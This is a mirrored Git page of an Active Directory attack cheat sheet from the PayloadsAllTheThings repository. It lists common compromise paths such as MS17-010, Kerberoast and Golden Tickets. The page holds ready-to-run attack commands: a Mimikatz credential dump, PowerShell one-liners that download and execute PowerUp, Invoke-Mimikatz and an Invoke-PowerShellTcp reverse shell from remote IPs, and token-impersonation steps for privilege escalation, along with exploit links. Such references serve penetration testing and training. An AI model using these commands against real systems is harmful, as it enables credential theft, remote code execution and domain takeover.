ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 19:06:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
30019235f8
PayloadsAllTheThings/Methodology and Resources/Active Directory Attack.md

2.9 KiB
Raw Blame History

Active Directory Attacks

Most common paths to AD compromise

  • MS14-068
  • MS17-010 (Eternal Blue - Local Admin) 
    nmap -Pn -p445openmax-hostgroup 3script smb-vuln-ms17010 <ip_netblock>
  • Unconstrained Delegation (incl. pass-the-ticket)
  • OverPass-the-Hash (Making the most of NTLM password hashes)
  • Pivoting with Local Admin & Passwords in SYSVOL
  • Dangerous Built-in Groups Usage
  • Dumping AD Domain Credentials
  • Golden Tickets
  • Kerberoast
  • Silver Tickets
  • Trust Tickets

Tools

Mimikatz

load mimikatz
mimikatz_command -f sekurlsa::logonPasswords full

PowerSploit

https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks”
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"

PrivEsc - Token Impersonation (RottenPotato)

Binary available at : https://github.com/foxglovesec/RottenPotato
Binary available at : https://github.com/breenmachine/RottenPotatoNG

getuid
getprivs
use incognito
list\_tokens -u
cd c:\temp\
execute -Hc -f ./rot.exe
impersonate\_token "NT AUTHORITY\SYSTEM"

Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"

PrivEsc - MS14-068

Exploit Python : https://www.exploit-db.com/exploits/35474/

Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068

PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)

Powershell:
https://www.exploit-db.com/exploits/39719/
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1

Binary exe : https://github.com/Meatballs1/ms16-032

Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc

Kerberoast

https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
https://room362.com/post/2016/kerberoast-pt1/

Thanks to